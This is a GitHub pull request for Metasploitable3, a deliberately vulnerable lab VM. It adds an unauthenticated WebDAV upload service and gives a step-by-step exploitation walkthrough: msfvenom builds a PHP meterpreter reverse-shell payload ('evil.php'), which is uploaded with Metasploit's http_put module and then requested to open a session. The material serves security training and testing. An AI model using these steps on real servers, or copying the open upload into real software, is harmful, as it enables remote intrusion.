Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add WebDAV for Metasploitable3 #16

Merged
merged 1 commit into from
Oct 24, 2016
Merged

Add WebDAV for Metasploitable3 #16

merged 1 commit into from
Oct 24, 2016

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Oct 19, 2016
edited
Loading

This adds WebDAV to Metasploitable. The PR replaces #13.

Verification:

  • Do: vagrant destroy && vagrant up to build the image
  • Once you're in the VM, you should see that port 8585 is running
  • In your terminal, do: nc IP 8585
  • And then type: PUT /uploads/test.txt HTTP/1.0, and then hit [ENTER] twice
  • You should see that the server responds with HTTP/1.1 201 Created
  • On Metasploitable3, if you go to C:\wamp\www\uploads, you should see the test.txt file

For exploitation:

  • Generate a PHP meterpreter: ./msfvenom -p php/meterpreter/reverse_tcp lhost=[IP] lport=5555 -f raw -o /tmp/evil.php
  • Open a msfconsole, and start a handler for the php/meterpreter/reverse_tcp
  • Open another msfconsole, do: use auxiliary/scanner/http/http_put
  • Do: set FILEDATA file://tmp/evil.php
  • Do: set FILENAME evil.php
  • Do: set RHOSTS [IP]
  • Do: set RPORT 8585
  • Do: run
  • If http_put module hangs, check the other msfconsole, there might a payload session established. If you don't see a session, manually request: http://IP:8585/uploads/evil.php, and that should get you a session.

@wchen-r7 wchen-r7 changed the title Add WebDAV Add WebDAV for Metasploitable3 Oct 19, 2016
@jbarnett-r7 jbarnett-r7 merged commit 931f434 into master Oct 24, 2016
@jbarnett-r7 jbarnett-r7 deleted the apache_webdav branch April 12, 2017 15:35
@jbarnett-r7 jbarnett-r7 mentioned this pull request Apr 13, 2017
Merged
15 tasks
usmcfiredog added a commit to usmcfiredog/metasploitable3 that referenced this pull request Sep 20, 2020
@usmcfiredog
Merge pull request rapid7#16 from rapid7/apache_webdav
bb26140 
Add WebDAV for Metasploitable3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@wchen-r7 @jbarnett-r7